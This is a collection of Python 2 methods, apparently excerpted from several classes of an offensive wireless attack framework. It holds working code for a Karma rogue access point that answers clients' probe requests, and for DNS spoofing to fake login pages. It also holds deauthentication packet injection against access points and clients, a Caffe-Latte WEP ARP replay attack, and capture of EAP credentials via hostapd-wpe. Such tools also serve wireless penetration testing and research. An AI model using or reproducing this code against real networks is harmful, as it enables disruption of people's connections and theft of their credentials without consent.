def stop_access_point(self, free_plugins=True):
"""This method cleanly stops the access point and all its background services."""
for plugin in self.plugins:
SessionManager().log_event(
NeutralEvent(
"Running pre_stop method for '{}' plugin.".format(plugin)))
plugin.pre_stop()
print "[+] Stopping dnsmasq and hostapd services"
self.aplauncher.stop_access_point()
self.dnsmasqhandler.stop_dnsmasq()
self.running_interface = None
SessionManager().log_event(NeutralEvent("AirHost module stopped."))
print "[+] Access Point stopped..."
for plugin in self.plugins:
SessionManager().log_event(
NeutralEvent(
"Running post_stop method for '{}' plugin.".format(
plugin)))
plugin.post_stop()
if free_plugins and len(self.plugins) > 0:
for plugin in self.plugins:
SessionManager().log_event(
NeutralEvent(
"Running restore method for '{}' plugin.".format(
plugin)))
plugin.restore()
del self.plugins[:]
print "[+] Cleared Airhost plugins"
def post_scanning_configurations(self):
# Escrever num ficheiro depois ler se for chamado no airhost
card = NetworkCard(self.ap_interface)
max_supported_access_points = card.get_number_of_supported_aps()
print "Max aps: ", max_supported_access_points
if self.max_access_points > max_supported_access_points:
print "[-] max_access_points is higher than what card supports. Setting to {}".format(
max_supported_access_points)
self.max_access_points = max_supported_access_points
self.aplauncher = APLauncher(self.hostapd_conf)
self.dnsmasqhandler = DNSMasqHandler(self.dnsmasq_conf)
rand_mac = "52:54:00:%02x:%02x:%02x" % (randint(0, 255), randint(
0, 255), randint(0, 255))
final_list = []
if len(self.lonely_probes) < self.max_access_points:
print "[+] Adding all requested ssids to hostapd configuration."
for probe in self.lonely_probes:
print "[+] Adding '{}' with hit_count '{}' to hostapd configuration".format(
probe, self.hit_count[probe])
final_list = list(self.lonely_probes)
SessionManager().log_event(
NeutralEvent("Added all found probes to Karma list."))
else:
inverted_popular_ssids = {
hit_count: ssid
for ssid, hit_count in self.hit_count.iteritems()
}
ordered_popularity = sorted(inverted_popular_ssids.keys())[::-1]
for i in ordered_popularity:
popular_ssid = inverted_popular_ssids[i]
final_list.append(popular_ssid)
print "[+] Adding '{}' with hit_count '{}' to hostapd configuration".format(
popular_ssid, self.hit_count[popular_ssid])
SessionManager().log_event(
NeutralEvent(
"Added '{}' to Karma list.".format(popular_ssid)))
if len(final_list) == self.max_access_points:
break
self.number_of_configured_nets = len(final_list)
NetworkManager().set_mac_and_unmanage(self.ap_interface, rand_mac,
True,
self.number_of_configured_nets)
self.dnsmasqhandler.set_captive_portal_mode(self.captive_portal)
self.dnsmasqhandler.write_dnsmasq_configurations(
self.ap_interface, card.get_ip(), [
".".join(card.get_ip().split(".")[:3] + ["2"]),
".".join(card.get_ip().split(".")[:3] + ["254"])
], ["8.8.8.8", "8.8.4.4"], len(final_list))
self.aplauncher.write_hostapd_configurations(self.ap_interface,
final_list, rand_mac)
def handle_packet(self, packet):
is_client_packet = False
if Dot11Beacon in packet:
packet = Beacon(packet)
elif Dot11ProbeResp in packet:
packet = ProbeResponse(packet)
elif Dot11ProbeReq in packet:
packet = ProbeRequest(packet)
is_client_packet = True
else:
return
if is_client_packet and packet.ssid is not None and packet.ssid != "":
self.lonely_probes.add(packet.ssid)
try:
self.hit_count[packet.ssid] += 1
except:
self.hit_count[packet.ssid] = 1
SessionManager().log_event(
NeutralEvent("Karma found Probe Request for '{}'".format(
packet.ssid)))
else:
self.present_networks.add(packet.ssid)
if self.ghost_ap:
self.lonely_probes -= self.present_networks
def _log_client(self, probe):
SessionManager().log_event(
NeutralEvent("Identified Client from {} Packet."
" Client MAC: '{}', AP SSID '{}'{}.".format(
probe.type, probe.client_mac, probe.ap_ssid,
", AP BSSID '{}'".format(probe.ap_bssids[0])
if probe.type == "ASSO" else "")))
def start_sniffer(self, interface):
"""
This method launches the necessary threads for the sniffing process.
"""
self.running_interface = interface
SessionManager().log_event(NeutralEvent("Starting AirScanner module."))
try:
card = NetworkCard(interface)
if card.get_mode().lower() != 'monitor':
card.set_mode('monitor')
except:
print "[-] Could not set card to monitor mode. Card might be busy."
SessionManager().log_event(
UnsuccessfulEvent(
"AirScanner start was aborted, unable to set card to monitor mode."
))
return
for plugin in self.plugins:
plugin.pre_scanning()
self.sniffer_running = True
self.sniffing_thread = Thread(target=self.sniff_packets)
self.sniffing_thread.start()
hopper_thread = Thread(target=self.hop_channels)
hopper_thread.start()
def _log_probe(self, probeInfo):
SessionManager().log_event(
NeutralEvent("Found Probe {} {} '{}' {} SSID '{}'.".format(
probeInfo.type, "from" if probeInfo.type == "REQ" else "to",
probeInfo.client_mac,
"to" if probeInfo.type == "REQ" else "from",
probeInfo.ap_ssid)))
def add_page_to_spoof(self, page_name):
for page in os.listdir("data/spoofpages/"):
if page_name in page:
self.spoofpages.append(page)
print "[+] Added '{page}' to spoof list".format(page = page)
SessionManager().log_event(NeutralEvent("Added '{page}' to spoof list".format(page = page)))
return
print "[-] Page '{}' not found in 'data/spoofpages/' folder."
def start_spoofing(self, spoof_ip):
if not self.has_http_server():
print "[-] No HTTP Server added to DNSSpoofer, cannot spoof pages"
return False
self.httpserver.reset_conf()
self.map_spoofing_pages(spoof_ip)
self.setup_spoofing_pages()
self.httpserver.start_server()
SessionManager().log_event(NeutralEvent("Sarted local HTTP Server."))
def interpret_targets(self, ap_targets, client_targets):
"""
A broadcast Deauth packet is created for every access point in the list.
A directed Deauth packet is created for every client in the list.
"""
# Packet creation based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
if not self._targeted_only:
for access_point in ap_targets:
deauth_packet = RadioTap() / \
Dot11(type=0, subtype=12, addr1="FF:FF:FF:FF:FF:FF",
addr2=access_point.bssid,
addr3=access_point.bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet)
SessionManager().log_event(NeutralEvent("Added AP with BSSID '{}' as deauthentication target."
.format(access_point.bssid)))
for client in client_targets:
mac = client.client_mac
bssid = client.associated_bssid
if bssid is None:
continue
deauth_packet1 = RadioTap() / \
Dot11(type=0, subtype=12, addr1=bssid, addr2=mac, addr3=mac) / \
Dot11Deauth(reason=7)
deauth_packet2 = RadioTap() / \
Dot11(type=0, subtype=12, addr1=mac, addr2=bssid, addr3=bssid) / \
Dot11Deauth(reason=7)
self.packets.add(deauth_packet1)
self.packets.add(deauth_packet2)
SessionManager().log_event(NeutralEvent("Added Client with MAC '{}' as deauthentication target."
.format(mac)))
def periodic_attack(self):
while self.is_running:
try:
for bssid in self.deauth_bssids:
for client in self.clients_to_deauth:
print "[+] Periodic attack on {} vs {}".format(client, self.deauth_ssid)
SessionManager().log_event(NeutralEvent(
"Periodic attack on {} vs {}".format(client, self.deauth_ssid)))
self.reactive_attack(client, bssid)
except:
# Set sizes are likely to change and this raises exceptions
# I know how and that I can use locks, but this will lock the resource for too long
# This little hack ignores the exception and the attack starts over.
pass
sleep(5)
def handle_packet(self, packet):
parsed_packet = None
if (Dot11ProbeReq in packet) or \
(Dot11AssoReq in packet) or \
(Dot11ReassoReq in packet) or \
(Dot11Auth in packet and packet[Dot11Auth].status):
parsed_packet = ClientPacket(packet)
elif (Dot11ProbeResp in packet) or \
(Dot11AssoResp in packet) or \
(Dot11ReassoResp in packet) or \
(Dot11Auth in packet and not packet[Dot11Auth].status):
parsed_packet = AccessPointPacket(packet)
if parsed_packet is not None and \
parsed_packet.client_mac not in self.ignore_clients and \
parsed_packet.client_mac not in self.deauth_bssids and \
parsed_packet.ssid == self.deauth_ssid:
# When multiple access points have same ssid they are deauthed and logged
if parsed_packet.bssid not in self.deauth_bssids:
print "[+] Adding '{}' to the access points to deauthenticate list.".format(parsed_packet.bssid)
print "[+] Initial general Deauthentication attack on {}({}) started".format(self.deauth_ssid,
parsed_packet.bssid)
self.general_deauth_attack(parsed_packet.bssid)
self.general_deauth_attack_completed = True
print "[+] General Deauthentication attack on {}({}) finished".format( self.deauth_ssid,
parsed_packet.bssid)
self.deauth_bssids.add(parsed_packet.bssid) # Sets don't duplicate, no need to check
if parsed_packet.client_mac not in self.deauth_bssids: # May have parsed client as bssid
self.clients_to_deauth.add(parsed_packet.client_mac)
print "[+] Saw a {packet} packet from {ssid} to {mac}({vendor})".format(packet = parsed_packet.__class__.__name__,
mac = parsed_packet.client_mac,
vendor = parsed_packet.client_vendor,
ssid = parsed_packet.ssid)
print "[+] Breaking up {mac}({vendor}) and {ssid}".format( mac = parsed_packet.client_mac,
vendor = parsed_packet.client_vendor,
ssid = parsed_packet.ssid)
self.reactive_attack(parsed_packet.client_mac, parsed_packet.bssid)
SessionManager().log_event(NeutralEvent(
"Reactive attack on {} vs {}"
.format(parsed_packet.client_mac, parsed_packet.bssid)))
def pre_start(self):
# Prepare Threads
sniffer_thread = Thread(target=self.sniff_packets)
printer_thread = Thread(target=self.print_status)
# Start Threads and Timer
sniffer_thread.start()
printer_thread.start()
self.stop_timer()
SessionManager().log_event(
NeutralEvent("Karma plugin sniffing for probe requests."))
# Wait for sniffer to finish
sniffer_thread.join()
# Configure hostapd and dnsmasq
self.post_scanning_configurations()
def replay_attack(self):
socket = conf.L2socket(iface = self.sniffing_interface)
print "[+] Starting replay attack"
while self.replay_attack_running:
# Always send fresh new packets
try:
for p in self.flipped_arp_packets:
socket.send(p)
self.n_arp_packets_sent += 1
except:
# No buffer space available.. wait and keep sending
sleep(.25)
print "[+] Stopped replay attack from last ARP packet"
socket.close()
SessionManager().log_event(NeutralEvent("Stopped Caffe-Latte attack. Logged {} WEP Data packets."
.format(self.tcpdump_logger.get_wep_data_count())))
def injection_thread_pool_start(self, plugin_method):
plugin_threads = []
for plugin in self.plugins:
plugin_methods = {
"pre_injection": plugin.pre_injection,
"inject_packets": plugin.inject_packets,
"post_injection": plugin.post_injection
}
plugin_injection_thread = Thread(
target=plugin_methods[plugin_method])
plugin_threads.append(plugin_injection_thread)
plugin_injection_thread.start()
SessionManager().log_event(
NeutralEvent("Started '{}' with '{}' plugin.".format(
plugin_method, plugin)))
for thread in plugin_threads:
thread.join() # Wait to finish execution
del plugin_threads[:] # Cleanup
def start_injection_attack(self, interface):
SessionManager().log_event(
NeutralEvent("Starting AirInjector module."))
self.injection_interface = interface
card = NetworkCard(interface)
current_mode = card.get_mode().lower()
self._previous_mode = current_mode
if not (current_mode == 'monitor' or current_mode == 'ap'):
try:
card.set_mode('monitor')
except:
SessionManager().log_event(
UnsuccessfulEvent("AirInjector start was aborted,"
" cannot set card to monitor mode."))
return
self.injection_running = True
injection_thread = Thread(target=self.injection_attack)
injection_thread.start()
def start_access_point(self, interface, print_credentials):
"""
This method starts an access point on the specified interface.
It assumes that the interface is umanaged.
It also starts the DHCP and DNS servers with dnsmasq
alongside the access point so it is instantly fully functional.
Access Point configurations are read by the APLauncher.
The print_credentials flag is used by the APLauncher
to print out EAP credentials caught by hostapd-wpe.
"""
SessionManager().log_event(NeutralEvent("Starting AirHost module."))
print "[+] Killing already started processes and restarting network services"
# Restarting services helps avoiding some conflicts with dnsmasq
self.stop_access_point(False)
print "[+] Running airhost plugins pre_start"
for plugin in self.plugins:
plugin.pre_start()
self.aplauncher.print_creds = print_credentials
self.aplauncher.start_access_point(interface)
if not self.dnsmasqhandler.start_dnsmasq():
SessionManager().log_event(
UnsuccessfulEvent(
"Error starting dnsmasq. AirHost module start was aborted."
), True)
self.stop_access_point()
return False
self.running_interface = interface
print "[+] Running airhost plugins post_start"
for plugin in self.plugins:
plugin.post_start()
print "[+] Access Point launched successfully"
SessionManager().log_event(
SuccessfulEvent("AirHost module started successfully."))
return True
def handle_beacon_packets(self, packet):
beacon = Beacon(packet)
if beacon.bssid in self.access_points:
self.access_points[beacon.bssid].rssi = beacon.rssi
SessionManager().update_session_data("sniffed_aps",
self.access_points)
return
id = len(self.access_points.keys())
if beacon.ssid is not None: # Not adding malformed packets
new_ap = AccessPoint(id, beacon.ssid, beacon.bssid, beacon.channel,
beacon.rssi, beacon.encryption, beacon.cipher,
beacon.auth)
with self.ap_lock:
self.access_points[beacon.bssid] = new_ap
SessionManager().log_event(
NeutralEvent(
"Found new AP broadcasting '{}' with bssid '{}'.".format(
beacon.ssid, beacon.bssid)))
SessionManager().update_session_data("sniffed_aps",
self.access_points)
def inject_packets(self):
count = self._burst_count if self._burst_count > 0 else 5
print dedent("[+] Starting deauthentication attack \n\
- {nburst} bursts of 1 packets \n\
- {npackets} different packets").format( nburst=self._burst_count,
npackets=len(self.packets))
SessionManager().log_event(NeutralEvent("Staring Deuthentication Attack"))
try:
while count >= 0 and not self.should_stop:
for packet in self.packets:
self.injection_socket.send(packet)
count -= 1
except socket_error as e:
if not e.errno == 100:
print e
except Exception as e:
print "Exception: {}".format(e)
print "[-] Stopped deauthentication attack because of error."
SessionManager().log_event(UnsuccessfulEvent("Deauthentication attack crashed with error: {}"
.format(str(e))))
def sniff_packets(self):
SessionManager().log_event(
SuccessfulEvent("AirScanner module started successfully."))
print "[+] Starting packet sniffer on interface '{}'".format(
self.running_interface)
try:
conf.use_pcap = True # Accelerate sniffing -> Less packet loss
sniff(iface=self.running_interface,
store=0,
prn=self.handle_packets,
stop_filter=(lambda pkt: not self.sniffer_running))
except Exception as e:
print str(e)
print "[-] Exception occurred while sniffing on interface '{}'".format(
self.running_interface)
SessionManager().log_event(
UnsuccessfulEvent(
"AirScanner crashed during execution: {}.".format(str(e))))
SessionManager().log_event(NeutralEvent("AirScanner module stopped."))
print "[+] Packet sniffer on interface '{}' has finished".format(
self.running_interface)
self._clean_quit(wait=False)
def pre_scanning(self):
self.packet_logger = PcapWriter(self.destination_folder +
self.current_log_file,
append=True,
sync=True)
SessionManager().log_event(NeutralEvent("Packet Logger initiated."))
def pre_scanning(self):
# Start WEP access point
self.wep_ap.start()
SessionManager().log_event(NeutralEvent(
"Starting Minimalistic WEP AP with ssid '{}' to perform Caffe-Latte attack."
.format(self.ap_ssid)))
